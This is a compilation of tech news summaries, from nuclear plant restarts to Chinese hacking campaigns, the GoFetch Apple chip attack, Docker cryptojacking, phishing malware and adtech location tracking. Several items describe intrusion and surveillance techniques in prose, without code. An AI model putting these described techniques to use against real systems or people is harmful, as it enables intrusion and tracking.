The Palisades Nuclear Plant in Michigan has won a $1.5 billion conditional federal loan to reopen after being closed for decommissioning in 2022. Canary Media reports: If the loan is granted (subject to Holtec meeting closing conditions) and the 800-megawatt reactor located on Lake Michigan is repowered, it would be the first nuclear plant in the U.S. to reopen after being closed for decommissioning. Surprisingly, it would be just the second or third reactor to restart in the history of global civil nuclear power, according to Mycle Schneider, lead author of the World Nuclear Industry Status Report 2023, in an interview with Bulletin of the Atomic Scientists.

Holtec purchased Palisades a month after it shut down with plans to mothball the site, but plans changed. Now the firm, which specializes in nuclear waste management and decommissioning (as opposed to rebuilding and operating nuclear plants), intends to revive the plant instead. Holtec plans to get the power plant restarted by the end of 2025, a breathtakingly aspirational target given nuclear's history of missing construction and cost targets. The Palisades plant was closed by utility Entergy in May 2022 due to financial issues after operating for more than a half-century. And while the plant had a strong operational performance record in recent years, it also has a sobering history of shutdowns due to failures of critical equipment, as well as broken fuel rods and fuel-spill incidents. The site was shut down for the final time a few days ahead of schedule due to concerns about the reliability of a key piece of equipment.

When it was operating at its peak, the plant provided more than 600 high-paying jobs, many unionized. If restarted, the plant could drive up to $363 million in regional economic impact, according to Michigan Governor Gretchen Whitmer, a Democrat. That's why Whitmer and a bipartisan coalition of lawmakers back resurrecting the retired reactor. Local business owners and residents are "largely supportive" of the plan as well, according to local news site MLive. The state's 2024 budget devotes $150 million to the project. Still, the revival of the dormant Palisades faces its share of headwinds.

An anonymous reader shared this report from The Register: Chinese spies exploited a couple of critical-severity bugs in F5 and ConnectWise equipment earlier this year to sell access to compromised U.S. defense organizations, UK government agencies, and hundreds of other entities, according to Mandiant.

The Google-owned threat hunters said they assess, "with moderate confidence," that a crew they track as UNC5174 was behind the exploitation of CVE-2023-46747, a 9.8-out-of-10-CVSS-rated remote code execution bug in the F5 BIG-IP Traffic Management User Interface, and CVE-2024-1709, a path traversal flaw in ConnectWise ScreenConnect that scored a perfect 10 out of 10 CVSS severity rating.

UNC5174 uses the online persona Uteus, and has bragged about its links to China's Ministry of State Security (MSS) — boasts that may well be true. The gang focuses on gaining initial access into victim organizations and then reselling access to valuable targets... Just last month, Mandiant noticed the same combination of tools, believed to be unique to this particular Chinese gang, being used to exploit the ConnectWise flaw and compromise "hundreds" or entities, mostly in the U.S. and Canada. Also between October 2023 and February 2024, UNC5174 exploited CVE-2023-22518 in Atlassian Confluence, CVE-2022-0185 in Linux kernels, and CVE-2022-3052, a Zyxel Firewall OS command injection vulnerability, according to Mandiant.

These campaigns included "extensive reconnaissance, web application fuzzing, and aggressive scanning for vulnerabilities on internet-facing systems belonging to prominent universities in the U.S., Oceania, and Hong Kong regions," the threat intel team noted.
More details from The Record. "One of the strangest things the researchers found was that UNC5174 would create backdoors into compromised systems and then patch the vulnerability they used to break in. Mandiant said it believes this was an 'attempt to limit subsequent exploitation of the system by additional unrelated threat actors attempting to access the appliance.'"

"There is a new side channel attack against Apple 'M' series CPUs that does not appear to be fixable without a major performance hit," writes Slashdot reader EncryptedSoldier. SecurityWeek reports: A team of researchers representing several universities in the United States has disclosed the details of a new side-channel attack method that can be used to extract secret encryption keys from systems powered by Apple CPUs. The attack method, dubbed GoFetch, has been described as a microarchitectural side-channel attack that allows the extraction of secret keys from constant-time cryptographic implementations. These types of attacks require local access to the targeted system. The attack targets a hardware optimization named data memory-dependent prefetcher (DMP), which attempts to prefetch addresses found in the contents of program memory to improve performance.

The researchers have found a way to use specially crafted cryptographic operation inputs that allow them to infer secret keys, guessing them bits at a time by monitoring the behavior of the DMP. They managed to demonstrate end-to-end key extraction attacks against several crypto implementations, including OpenSSL Diffie-Hellman Key Exchange, Go RSA, and the post-quantum CRYSTALS-Kyber and CRYSTALS-Dilithium. The researchers have conducted successful GoFetch attacks against systems powered by Apple M1 processors, and they have found evidence that the attack could also work against M2 and M3 processors. They have also tested an Intel processor that uses DMP, but found that it's 'more robust' against such attacks.

The experts said Apple is investigating the issue, but fully addressing it does not seem trivial. The researchers have proposed several countermeasures, but they involve hardware changes that are not easy to implement or mitigations that can have a significant impact on performance. Apple told SecurityWeek that it thanks the researchers for their collaboration as this work advances the company's understanding of these types of threats. The tech giant also shared a link to a developer page that outlines one of the mitigations mentioned by the researchers. The researchers have published a paper (PDF) detailing their work.

Ars Technica's Dan Goodin also reported on the vulnerability.

The Dutch pirate site blocklist has expanded with two new targets, shadow libraries Anna's Archive and Library Genesis. The court order was obtained by local anti-piracy group BREIN, acting on behalf of major publishers. Interestingly, Z-Library isn't listed in the blocking order, despite explicit warnings previously issued by BREIN. TorrentFreak reports: All blocking requests were submitted by local anti-piracy group BREIN, which acts on behalf of rightsholders. These include the major Hollywood studios but BREIN's purview is much broader. Last week, it obtained the latest blocking order, this time on behalf of the publishing industry. Issued by the Rotterdam District Court, the order requires a local Internet provider to block two well-known shadow libraries; "Anna's Archive" and "Library Genesis" (LibGen). News of this new court order was shared by BREIN which notes that both sites were found to make copyright infringing works available on a large scale. At the time of writing, a published copy is not available but, based on the covenant, all large Internet providers are expected to implement the blockades. "These types of illegal shadow libraries are very harmful. The only ones who benefit are the anonymous owners of these illegal services. Authors and publishers see no return on their efforts and investments," BREIN comments. "Copyright holders deserve an honest living. There are numerous legal ways to obtain ebooks. If desired, this can also be done very cheaply; through the library for example."

The Rotterdam court issued a so-called 'dynamic' blocking order, meaning that rightsholders can update the targeted domains and IP addresses if the sites switch to new ones in the future. This also applies to mirrors and increases the blockades' effectiveness, as there is no need to return to court. Previously, Internet provider KPN challenged these 'dynamic' orders, suggesting that they are too broad. The court rejected this argument, however, noting that the process hasn't led to any major problems thus far. BREIN further reports that Google is voluntarily offering a helping hand. As reported in detail previously, the search engine removes blocked domains from its local search results after being notified about an ISP blocking order. "The effectiveness of the blocking measure is increased because Google cooperates in combating these infringements and, at the request of BREIN, completely removes all references to websites that are blocked by order of the Dutch court from the search results," BREIN writes.

An anonymous reader quotes a report from The Verge: When Nintendo sued the developers of Yuzu out of existence on March 4th, it wasn't just an attack on the leading way to play Nintendo Switch games without a Switch. It was a warning to anyone building a video game emulator. Seven developers have now stepped away from projects, are shutting them down, or have left the emulation scene entirely. Of those that remain, many are circling the wagons, getting quieter and more careful, trying not to paint targets on their backs. Four developers declined to talk to The Verge, telling me they didn't want to draw attention. One even tried to delete answers to my questions after we'd begun, suddenly scared of attracting press.

Not everyone is so afraid. Four other emulator teams tell me they're optimistic Nintendo won't challenge them, that they're on strong legal footing, and that Yuzu may have been an unusually incriminating case. One decade-long veteran tells me everyone's just a bit more worried. But when I point out that Nintendo didn't have to prove a thing in court, they all admit they don't have money for lawyers. They say they'd probably be forced to roll over, like Yuzu, if the Japanese gaming giant came knocking. "I would do what I'd have to do," the most confident of the four tells me. "I would want to fight it... but at the same time, I know we exist because we don't antagonize Nintendo."

There's a new meme where Yuzu is the mythical Hydra: cut off one head, and two more take its place. It's partly true in how multiple forks of Yuzu (and 3DS emulator Citra) sprung up shortly after their predecessors died: Suyu, Sudachi, Lemonade, and Lime are a few of the public names. But they're not giving Nintendo the middle finger: they're treating Nintendo's lawsuit like a guidebook about how not to piss off the company. In its legal complaint, Nintendo claimed Yuzu was "facilitating piracy at a colossal scale," giving users "detailed instructions" on how to "get it running with unlawful copies of Nintendo Switch games," among other things. Okay, no more guides, say the Switch emulator developers who spoke to me. They also say they're stripping out some parts of Yuzu that made it easier to play pirated games. As Ars Technica reported, a forked version called Suyu will require you to bring the firmware, title.keys, and prod.keys from your Switch before you can decrypt and play Nintendo games. Only one of those was technically required before. (Never mind that most people don't have an easily hackable first-gen Switch and would likely download these things off the net.) The developer of another fork tells me he plans to do something similar, making users "fend for yourself" by making sure the code doesn't auto-generate any keys.

Most developers I spoke to are also trying to make it clear they aren't profiting at Nintendo's expense. One who initially locked early access builds behind a donation page has stopped doing that, making them publicly available on GitHub instead. The leader of another project tells me nothing will ever be paywalled, and for now, there's "strictly no donation," either. When I ask about the Dolphin Emulator, which faced a minor challenge from Nintendo last year, I'm told it publicly exposes its tiny nonprofit budget for anyone to scrutinize. But I don't know that these steps are enough to prevent Nintendo from throwing around its weight again, particularly when it comes to emulating the Nintendo Switch, its primary moneymaker. Since Yuzu's shut down, a slew of other emulators left the scene. The include (as highlighted by The Verge):

- The Citra emulator for Nintendo 3DS is gone
- The Pizza Boy emulators for Nintendo Game Boy Advance and Game Boy Color are gone
- The Drastic emulator for Nintendo DS is free for now and will be removed
- The lead developer of Yuzu and Citra has stepped away from emulation
- The lead developer of Strato, a Switch emulator, has stepped away from emulation
- Dynarmic, used to speed up various emulators including Yuzu, has abruptly ended development
- One contributor on Ryujinx, a Switch emulator, has stepped away from the project
- AetherSX2, a PS2 emulator, is finally gone (mostly unrelated; development was suspended a year ago)

Researchers at Cado Security Labs received an alert about a honeypot using the Docker Engine API. "A Docker command was received..." they write, "that spawned a new container, based on Alpine Linux, and created a bind mount for the underlying honeypot server's root directory..." Typically, this is exploited to write out a job for the Cron scheduler to execute... In this particular campaign, the attacker exploits this exact method to write out an executable at the path /usr/bin/vurl, along with registering a Cron job to decode some base64-encoded shell commands and execute them on the fly by piping through bash.

The vurl executable consists solely of a simple shell script function, used to establish a TCP connection with the attacker's Command and Control (C2) infrastructure via the /dev/tcp device file. The Cron jobs mentioned above then utilise the vurl executable to retrieve the first stage payload from the C2 server... To provide redundancy in the event that the vurl payload retrieval method fails, the attackers write out an additional Cron job that attempts to use Python and the urllib2 library to retrieve another payload named t.sh
"Multiple user mode rootkits are deployed to hide malicious processes," they note. And one of the shell scripts "makes use of the shopt (shell options) built-in to prevent additional shell commands from the attacker's session from being appended to the history file... Not only are additional commands prevented from being written to the history file, but the shopt command itself doesn't appear in the shell history once a new session has been spawned."

The same script also inserts "an attacker-controlled SSH key to maintain access to the compromised host," according to the article, retrieves a miner for the Monero cryptocurrency and then "registers persistence in the form of systemd services" for both the miner and an open source Golang reverse shell utility named Platypus.

It also delivers "various utilities," according to the blog Security Week, "including 'masscan' for host discovery." Citing CADO's researchers, they write that the shell script also "weakens the machine by disabling SELinux and other functions and by uninstalling monitoring agents." The Golang payloads deployed in these attacks allow attackers to search for Docker images from the Ubuntu or Alpine repositories and delete them, and identify and exploit misconfigured or vulnerable Hadoop, Confluence, Docker, and Redis instances exposed to the internet... ["For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host," the researchers writes.]

"This extensive attack demonstrates the variety in initial access techniques available to cloud and Linux malware developers," Cado notes. "It's clear that attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments."

"A 20-year-old Trojan resurfaced recently," reports Dark Reading, "with new variants that target Linux and impersonate a trusted hosted domain to evade detection." Researchers from Palo Alto Networks spotted a new Linux variant of the Bifrost (aka Bifrose) malware that uses a deceptive practice known as typosquatting to mimic a legitimate VMware domain, which allows the malware to fly under the radar. Bifrost is a remote access Trojan (RAT) that's been active since 2004 and gathers sensitive information, such as hostname and IP address, from a compromised system.

There has been a worrying spike in Bifrost Linux variants during the past few months: Palo Alto Networks has detected more than 100 instances of Bifrost samples, which "raises concerns among security experts and organizations," researchers Anmol Murya and Siddharth Sharma wrote in the company's newly published findings.

Moreover, there is evidence that cyberattackers aim to expand Bifrost's attack surface even further, using a malicious IP address associated with a Linux variant hosting an ARM version of Bifrost as well, they said... "As ARM-based devices become more common, cybercriminals will likely change their tactics to include ARM-based malware, making their attacks stronger and able to reach more targets."

John Timmer reports via Ars Technica: A company called Colossal plans to pioneer the de-extinction business, taking species that have died within the past few thousand years and restoring them through the use of DNA editing and stem cells. It's grabbed headlines recently by announcing some compelling targets: the thylacine, an extinct marsupial predator, and an icon of human carelessness, the dodo. But the company was formed to tackle an even more audacious target: the mammoth, which hasn't roamed the Northern Hemisphere for thousands of years. Obviously, there are a host of ethical and conservation issues that would need to be worked out before Colossal's plans go forward. But there are some major practical hurdles as well, most of them the product of the distinct and extremely slow reproductive biology of the mammoth's closest living relatives, the elephants. At least one of those has now been cleared, as the company is announcing the production of the first elephant stem cells. The process turned out to be extremely difficult, suggesting that the company still has a long road ahead of it. [...] Overall, it's a project that has a high probability of failure and may ultimately require generations of scientists. If we do successfully de-extinct a species, the first example will probably be a different species, even though the projects launched later.

But Colossal is forging ahead and cleared one of the many hurdles it faces: It created the first induced stem cells from elephants and will be placing a draft manuscript describing the process on a public repository on Wednesday. (Colossal provided Ars with an advanced version of the draft that, outside of a few editing errors, appears largely complete.) Beyond providing the technical details of how the process works, the manuscript describes a long, failure-ridden route to eventual success. Several methods have been developed to allow us to induce stem cells from the cells of an adult organism. The original Nobel-winning process developed by Shinya Yamanaka involved inserting the genes that encode four key embryonic regulatory genes into adult cells and allowing them to reprogram the adult cell into an embryonic state. That has proven effective in a variety of species but has a couple of drawbacks due to the fact that the four genes can potentially stick around, interfering with later development steps. Although there are ways around that, others have developed a cocktail of chemicals that perform a similar function by activating signaling pathways that, collectively, can also reprogram adult cells. When it works, this simplifies matters, as you only have to remove the chemicals to allow the stem cells to adopt other fates. Colossal tried both of these. Neither worked with elephant cells: "Multiple attempts with current standard reprogramming methods were tried, and failed, and resulted in no, or incomplete, reprogramming." Apparently, lots of additional trial and error ensued. The eventual solution ended up being based in part on combining the two primary options: Cells were first exposed to a chemical reprogramming cocktail and then given the four genes used in the alternative reprogramming method. On its own, however, that wasn't enough. The researchers also had to address a quirk of elephant biology.

Obviously, for Colossal, this is a means to an end: the mammoth. But that's remarkably underplayed in the manuscript. Instead, its emphasis is on the technology's use in the conservation of existing species. [T]he researchers note that studying things like elephant development and metabolism in actual elephants is not especially realistic. But we can potentially induce the stem cells developed here into any cell we'd want to study -- nerve, liver, heart, and so on. So, the stem cells described here could be a useful tool for research. So, these cells are being presented as a valuable tool for the research community. Still, you can expect the people behind the de-extinction project to be getting to work on some of the easier things: showing that the genome in the cells can be edited and that they can be induced to start the process of embryogenesis. Separately, some unfortunate individuals will need to be working on the hard problems we mentioned earlier.

A directive known as Document 79 ramps up Beijing's effort to replace U.S. tech with homegrown alternatives. From a report: For American tech companies in China, the writing is on the wall. It's also on paper, in Document 79. The 2022 Chinese government directive expands a drive that is muscling U.S. technology out of the country -- an effort some refer to as "Delete A," for Delete America. Document 79 was so sensitive that high-ranking officials and executives were only shown the order and weren't allowed to make copies, people familiar with the matter said. It requires state-owned companies in finance, energy and other sectors to replace foreign software in their IT systems by 2027.

American tech giants had long thrived in China as they hot-wired the country's meteoric industrial rise with computers, operating systems and software. Chinese leaders want to sever that relationship, driven by a push for self-sufficiency and concerns over the country's long-term security. The first targets were hardware makers. Dell, International Business Machines and Cisco Systems have gradually seen much of their equipment replaced by products from Chinese competitors.

Document 79, named for the numbering on the paper, targets companies that provide the software -- enabling daily business operations from basic office tools to supply-chain management. The likes of Microsoft and Oracle are losing ground in the field, one of the last bastions of foreign tech profitability in the country. The effort is just one salvo in a yearslong push by Chinese leader Xi Jinping for self-sufficiency in everything from critical technology such as semiconductors and fighter jets to the production of grain and oilseeds. The broader strategy is to make China less dependent on the West for food, raw materials and energy, and instead focus on domestic supply chains.

In an update on CBS' "60 Minutes" on Sunday, Blue Origin said it was aiming to send an uncrewed lander to the surface of the moon in the next 12 to 16 months. A crewed version is expected to follow. GeekWire reports: "We're expecting to land on the moon between 12 and 16 months from today," [said John Couluris, senior vice president for lunar permanence at Blue Origin]. "I understand I'm saying that publicly, but that's what our team is aiming towards." Couluris was referring to a pathfinder version of Blue Origin's nearly three-story-tall Blue Moon Mark 1 cargo lander, which is taking shape at Blue Origin's production facility in Huntsville, Ala. The Pathfinder Mission would demonstrate the MK1's capabilities -- including its hydrogen-fueled BE-7 engine, its precision landing system and its ability to deliver up to 3 tons of payload anywhere on the moon.

Blue Origin envisions building multiple cargo landers, as well as a crewed version of the Blue Moon lander that could transport NASA astronauts to and from the lunar surface. The MK1 cargo lander is designed for a single launch and delivery, but the crewed lander would be reusable. "We'll launch them to lunar orbit, and we'll leave them there," Couluris explained. "And we'll refuel them in orbit, so that multiple astronauts can use the same vehicle back and forth."

The Pathfinder Mission would be funded by Blue Origin, but NASA is providing support for other Blue Moon missions. Blue Origin's $3.4 billion contract with NASA calls for the crewed lander to be available for the Artemis 5 moon mission by 2029, with an uncrewed test flight as part of the buildup. The in-space refueling operation would make use of a cislunar transporter, built by Lockheed Martin, that could travel between low Earth orbit and lunar orbit with supplies. "We are now building with NASA the infrastructure to ensure lunar permanency," Couluris said. NASA is providing funding for the Blue Moon landing system as an alternative to SpaceX's Starship system, which is under development at SpaceX's Starbase in South Texas. The crewed Starship lunar lander is scheduled to come into play for Artemis 3, a milestone landing mission that's currently scheduled for 2026. [...]

Blue Origin plans to send the MK1 lander to the moon on its reusable New Glenn rocket, which is also under development. A couple of weeks ago, a pathfinder version of that rocket was raised on a Florida launch pad for the first time, and it's currently going through a series of cryogenic tanking tests. Blue Origin CEO Dave Limp, who was brought over to the company from Amazon last year to accelerate work on New Glenn, said in a LinkedIn post that he's "looking forward to bringing this heavy-lift capacity to our customers later this year." One of the early launches is tasked with sending a pair of NASA probes to Mars.

An anonymous reader quotes an excerpt from a Wired article: In 2019, a government contractor and technologist named Mike Yeagley began making the rounds in Washington, DC. He had a blunt warning for anyone in the country's national security establishment who would listen: The US government had a Grindr problem. A popular dating and hookup app, Grindr relied on the GPS capabilities of modern smartphones to connect potential partners in the same city, neighborhood, or even building. The app can show how far away a potential partner is in real time, down to the foot. But to Yeagley, Grindr was something else: one of the tens of thousands of carelessly designed mobile phone apps that leaked massive amounts of data into the opaque world of online advertisers. That data, Yeagley knew, was easily accessible by anyone with a little technical know-how. So Yeagley -- a technology consultant then in his late forties who had worked in and around government projects nearly his entire career -- made a PowerPoint presentation and went out to demonstrate precisely how that data was a serious national security risk.

As he would explain in a succession of bland government conference rooms, Yeagley was able to access the geolocation data on Grindr users through a hidden but ubiquitous entry point: the digital advertising exchanges that serve up the little digital banner ads along the top of Grindr and nearly every other ad-supported mobile app and website. This was possible because of the way online ad space is sold, through near-instantaneous auctions in a process called real-time bidding. Those auctions were rife with surveillance potential. You know that ad that seems to follow you around the internet? It's tracking you in more ways than one. In some cases, it's making your precise location available in near-real time to both advertisers and people like Mike Yeagley, who specialized in obtaining unique data sets for government agencies.

Working with Grindr data, Yeagley began drawing geofences -- creating virtual boundaries in geographical data sets -- around buildings belonging to government agencies that do national security work. That allowed Yeagley to see what phones were in certain buildings at certain times, and where they went afterwards. He was looking for phones belonging to Grindr users who spent their daytime hours at government office buildings. If the device spent most workdays at the Pentagon, the FBI headquarters, or the National Geospatial-Intelligence Agency building at Fort Belvoir, for example, there was a good chance its owner worked for one of those agencies. Then he started looking at the movement of those phones through the Grindr data. When they weren't at their offices, where did they go? A small number of them had lingered at highway rest stops in the DC area at the same time and in proximity to other Grindr users -- sometimes during the workday and sometimes while in transit between government facilities. For other Grindr users, he could infer where they lived, see where they traveled, even guess at whom they were dating.

Intelligence agencies have a long and unfortunate history of trying to root out LGBTQ Americans from their workforce, but this wasn't Yeagley's intent. He didn't want anyone to get in trouble. No disciplinary actions were taken against any employee of the federal government based on Yeagley's presentation. His aim was to show that buried in the seemingly innocuous technical data that comes off every cell phone in the world is a rich story -- one that people might prefer to keep quiet. Or at the very least, not broadcast to the whole world. And that each of these intelligence and national security agencies had employees who were recklessly, if obliviously, broadcasting intimate details of their lives to anyone who knew where to look. As Yeagley showed, all that information was available for sale, for cheap. And it wasn't just Grindr, but rather any app that had access to a user's precise location -- other dating apps, weather apps, games. Yeagley chose Grindr because it happened to generate a particularly rich set of data and its user base might be uniquely vulnerable. The report goes into great detail about how intelligence and data analysis techniques, notably through a program called Locomotive developed by PlanetRisk, enabled the tracking of mobile devices associated with Russian President Vladimir Putin's entourage. By analyzing commercial adtech data, including precise geolocation information collected from mobile advertising bid requests, analysts were able to monitor the movements of phones that frequently accompanied Putin, indicating the locations and movements of his security personnel, aides, and support staff.

This capability underscored the surveillance potential of commercially available data, providing insights into the activities and security arrangements of high-profile individuals without directly compromising their personal devices.

An anonymous reader quotes a report from NPR: ExxonMobil faces dozens of lawsuits from states and localities alleging the company lied for decades about its role in climate change and the dangers of burning fossil fuels. But now, ExxonMobil is going on the offensive with a lawsuit targeting investors who want the company to slash pollution that's raising global temperatures. Investors in publicly-traded companies like ExxonMobil try to shape corporate policies by filing shareholder proposals that are voted on at annual meetings. ExxonMobil says it's fed up with a pair of investor groups that it claims are abusing the system by filing similar proposals year after year in an effort to micromanage its business.

ExxonMobil's lawsuit points to growing tensions between companies and activist investors calling for corporations to do more to shrink their climate impact and prepare for a hotter world. Interest groups on both sides of the case say it could unleash a wave of corporate litigation against climate activists. It is happening at a time when global temperatures continue to rise, and corporate analysts say most companies aren't on track to meet targets they set to reduce their heat-trapping emissions. "Exxon is really upping the ante here in a big way by bringing this case," says Josh Zinner, chief executive of an investor coalition called the Interfaith Center on Corporate Accountability, whose members include a defendant in the ExxonMobil case. "Other companies could use this tactic not just to block resolutions," Zinner says, "but to intimidate their shareholders from even bringing these [climate] issues to the table."

ExxonMobil said in an email that it is suing the investor groups Arjuna Capital and Follow This because the U.S. Securities and Exchange Commission (SEC) isn't enforcing rules governing when investors can resubmit shareholder proposals. A court is the "the right place to get clarity on SEC rules," ExxonMobil said, adding that the case "is not about climate change." Other corporations are watching ExxonMobil's case, says Charles Crain, a vice president at the National Association of Manufacturers, which represents ExxonMobil and other industrial companies. "If companies are decreasingly able to get the SEC to allow them to exclude proposals that are obviously politically motivated, then the next question is, well, can the courts succeed where the SEC has failed -- or, more accurately, not even tried?," Crain says. "The shareholder proposal from Arjuna and Follow This called for ExxonMobil to cut emissions faster from its own operations and from its supply chain, including the pollution that's created when customers burn its oil and natural gas," notes NPR. "That indirect pollution, known as Scope 3 emissions, accounts for 90% of ExxonMobil's carbon footprint."

"ExxonMobil says it is committed to cutting emissions from its operations. But the idea that activist investors like Arjuna and Follow This can quickly push the company out of the oil and gas business with new climate policies is 'simplistic and against the interests of the vast majority of ExxonMobil shareholders,' the company said in a court filing in Texas." The company added that while shareholders are entitled to submit proposals, they don't have "an unlimited right to put forth any proposal to do anything."

"Their intent is to advance their agenda rather than creating long-term value for shareholders," ExxonMobil said of Arjuna and Follow This.

Hackers targeting individuals in the cryptocurrency sector are using a sophisticated phishing scheme that begins with a malicious link on Calendly. "The attackers impersonate established cryptocurrency investors and ask to schedule a video conference call," reports Krebs on Security. "But clicking the meeting link provided by the scammers prompts the user to run a script that quietly installs malware on macOS systems." From the report: A search in Google for a string of text from that script turns up a December 2023 blog post from cryptocurrency security firm SlowMist about phishing attacks on Telegram from North Korean state-sponsored hackers. "When the project team clicks the link, they encounter a region access restriction," SlowMist wrote. "At this point, the North Korean hackers coax the team into downloading and running a 'location-modifying' malicious script. Once the project team complies, their computer comes under the control of the hackers, leading to the theft of funds."

SlowMist says the North Korean phishing scams used the "Add Custom Link" feature of the Calendly meeting scheduling system on event pages to insert malicious links and initiate phishing attacks. "Since Calendly integrates well with the daily work routines of most project teams, these malicious links do not easily raise suspicion," the blog post explains. "Consequently, the project teams may inadvertently click on these malicious links, download, and execute malicious code."

SlowMist said the malware downloaded by the malicious link in their case comes from a North Korean hacking group dubbed BlueNoroff, which Kaspersky Labs says is a subgroup of the Lazarus hacking group. "A financially motivated threat actor closely connected with Lazarus that targets banks, casinos, fin-tech companies, POST software and cryptocurrency businesses, and ATMs," Kaspersky wrote of BlueNoroff in Dec. 2023.

An anonymous reader quotes a report from Ars Technica: A judge has dismissed (PDF) a complaint from a parent and guardian of a girl, now 15, who was sexually assaulted when she was 12 years old after Snapchat recommended that she connect with convicted sex offenders. According to the court filing, the abuse that the girl, C.O., experienced on Snapchat happened soon after she signed up for the app in 2019. Through its "Quick Add" feature, Snapchat "directed her" to connect with "a registered sex offender using the profile name JASONMORGAN5660." After a little more than a week on the app, C.O. was bombarded with inappropriate images and subjected to sextortion and threats before the adult user pressured her to meet up, then raped her. Cops arrested the adult user the next day, resulting in his incarceration, but his Snapchat account remained active for three years despite reports of harassment, the complaint alleged.

Two years later, at 14, C.O. connected with another convicted sex offender on Snapchat, a former police officer who offered to give C.O. a ride to school and then sexually assaulted her. The second offender is also currently incarcerated, the judge's opinion noted. The lawsuit painted a picture of Snapchat's ongoing neglect of minors it knows are being targeted by sexual predators. Prior to C.O.'s attacks, both adult users sent and requested sexually explicit photos, seemingly without the app detecting any child sexual abuse materials exchanged on the platform. C.O. had previously reported other adult accounts sending her photos of male genitals, but Snapchat allegedly "did nothing to block these individuals from sending her inappropriate photographs."

Among other complaints, C.O.'s lawsuit alleged that Snapchat's algorithm for its "Quick Add" feature was the problem. It allegedly recklessly works to detect when adult accounts are seeking to connect with young girls and, by design, sends more young girls their way -- continually directing sexual predators toward vulnerable targets. Snapchat is allegedly aware of these abuses and, therefore, should be held liable for harm caused to C.O., the lawsuit argued. Although C.O.'s case raised difficult questions, Judge Barbara Bellis ultimately agreed with Snapchat that Section 230 of the Communications Decency Act barred all claims and shielded Snap because "the allegations of this case fall squarely within the ambit of the immunity afforded to" platforms publishing third-party content. According to Bellis, C.O.'s family had "clearly alleged" that Snap had failed to design its recommendations systems to block young girls from receiving messages from sexual predators. Specifically, Section 230 immunity shields Snap from liability in this case because Bellis considered the messages exchanged to be third-party content. Snapchat designing its recommendation systems to deliver content is a protected activity, Bellis ruled. Despite a seemingly conflicting ruling in Los Angeles that found that "Section 230 didn't protect Snapchat from liability for allegedly connecting teens with drug dealers," Bellis didn't appear to consider it persuasive. She did, however, critique Section 230's broad application, suggesting courts are limited without legislative changes, despite the morally challenging nature of some cases.

An anonymous reader quotes a report from PBS: Chinese police are investigating an unauthorized and highly unusual online dump of documents from a private security contractor linked to the nation's top policing agency and other parts of its government -- a trove that catalogs apparent hacking activity and tools to spy on both Chinese and foreigners. Among the apparent targets of tools provided by the impacted company, I-Soon: ethnicities and dissidents in parts of China that have seen significant anti-government protests, such as Hong Kong or the heavily Muslim region of Xinjiang in China's far west. The dump of scores of documents late last week and subsequent investigation were confirmed by two employees of I-Soon, known as Anxun in Mandarin, which has ties to the powerful Ministry of Public Security. The dump, which analysts consider highly significant even if it does not reveal any especially novel or potent tools, includes hundreds of pages of contracts, marketing presentations, product manuals, and client and employee lists. They reveal, in detail, methods used by Chinese authorities used to surveil dissidents overseas, hack other nations and promote pro-Beijing narratives on social media.

The documents show apparent I-Soon hacking of networks across Central and Southeast Asia, as well as Hong Kong and the self-ruled island of Taiwan, which Beijing claims as its territory. The hacking tools are used by Chinese state agents to unmask users of social media platforms outside China such as X, formerly known as Twitter, break into email and hide the online activity of overseas agents. Also described are devices disguised as power strips and batteries that can be used to compromise Wi-Fi networks. I-Soon and Chinese police are investigating how the files were leaked, the two I-Soon employees told the AP. One of the employees said I-Soon held a meeting Wednesday about the leak and were told it wouldn't affect business too much and to "continue working as normal." The AP is not naming the employees -- who did provide their surnames, per common Chinese practice -- out of concern about possible retribution. The source of the leak is not known. Jon Condra, an analyst with Recorded Future, a cybersecurity company, called it the most significant leak ever linked to a company "suspected of providing cyber espionage and targeted intrusion services for the Chinese security services." According to Condra, citing the leaked material, I-Soon's targets include governments, telecommunications firms abroad and online gambling companies within China.

The FBI is "laser focused" on Chinese efforts to insert malicious software code into computer networks in ways that could disrupt critical US infrastructure, according to the agency's director Christopher Wray. From a report: Wray said he was acutely concerned about "pre-positioning" of malware. He said the US recently disrupted a Chinese hacking network known as Volt Typhoon that targeted American infrastructure including the electricity grid and water supply, and other targets around the world. "We're laser focused on this as a real threat and we're working with a lot of partners to try to identify it, anticipate it and disrupt it," Wray said on Sunday after attending the Munich Security Conference.

"I'm sober and clear minded about what we're up against...We're always going to have to be kind of on the balls of our feet." Wray said Volt Typhoon was just the tip of the iceberg and was one of many such efforts by the Chinese government. The US has been tracking Chinese pre-positioning operations for well over a decade, but Wray told the security conference that they had reached "fever pitch." He said China was increasingly inserting "offensive weapons within our critical infrastructure poised to attack whenever Beijing decides the time is right."

His comments are the latest FBI effort to raise awareness about Chinese espionage that ranges from traditional spying and intellectual property theft to hacking designed to prepare for possible future conflict. Last October, Wray and his counterparts from the Five Eyes intelligence-sharing network that includes the US, UK, Canada, Australia and New Zealand held their first public meeting in an effort to focus the spotlight on Chinese espionage. Wray said the US campaign was having an impact and that people were increasingly attuned to the threat, particularly compared with several years ago when he sometimes met scepticism.

An anonymous reader quotes a report from BleepingComputer: A new iOS and Android trojan named 'GoldPickaxe' employs a social engineering scheme to trick victims into scanning their faces and ID documents, which are believed to be used to generate deepfakes for unauthorized banking access. The new malware, spotted by Group-IB, is part of a malware suite developed by the Chinese threat group known as 'GoldFactory,' which is responsible for other malware strains such as 'GoldDigger', 'GoldDiggerPlus,' and 'GoldKefu.' Group-IB says its analysts observed attacks primarily targeting the Asia-Pacific region, mainly Thailand and Vietnam. However, the techniques employed could be effective globally, and there's a danger of them getting adopted by other malware strains. [...]

For iOS (iPhone) users, the threat actors initially directed targets to a TestFlight URL to install the malicious app, allowing them to bypass the normal security review process. When Apple remove the TestFlight app, the attackers switched to luring targets into downloading a malicious Mobile Device Management (MDM) profile that allows the threat actors to take control over devices. Once the trojan has been installed onto a mobile device in the form of a fake government app, it operates semi-autonomously, manipulating functions in the background, capturing the victim's face, intercepting incoming SMS, requesting ID documents, and proxying network traffic through the infected device using 'MicroSocks.'

Group-IB says the Android version of the trojan performs more malicious activities than in iOS due to Apple's higher security restrictions. Also, on Android, the trojan uses over 20 different bogus apps as cover. For example, GoldPickaxe can also run commands on Android to access SMS, navigate the filesystem, perform clicks on the screen, upload the 100 most recent photos from the victim's album, download and install additional packages, and serve fake notifications. The use of the victims' faces for bank fraud is an assumption by Group-IB, also corroborated by the Thai police, based on the fact that many financial institutes added biometric checks last year for transactions above a certain amount.

